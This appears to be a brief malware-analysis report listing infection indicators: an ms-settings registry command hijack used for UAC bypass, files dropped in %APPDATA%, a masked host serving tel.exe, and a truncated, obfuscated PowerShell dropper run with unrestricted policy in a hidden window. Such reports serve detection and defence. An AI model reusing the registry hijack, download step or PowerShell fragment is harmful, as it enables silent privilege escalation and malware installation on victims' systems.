Technical information
- [<HKCU>\Software\Classes\ms-settings\Shell\Open\command] '' = '%APPDATA%\IBcWC.bat'
- %APPDATA%\tel.exe
- %APPDATA%\ibcwc.bat
- 'so####ginshops.com':80
- http://so####ginshops.com/tel.exe
- DNS ASK so####ginshops.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function MJiXixeX($UiztLHcHjKY, $vzdnBLc){[IO.File]::WriteAllBytes($UiztLHcHjKY, $vzdnBLc)};function rDGefbRHzAICyiPC($GQCagFsIzXgaguNKNHf){$fyxWOjvvgZBEubggBrWb =...' (with hidden window)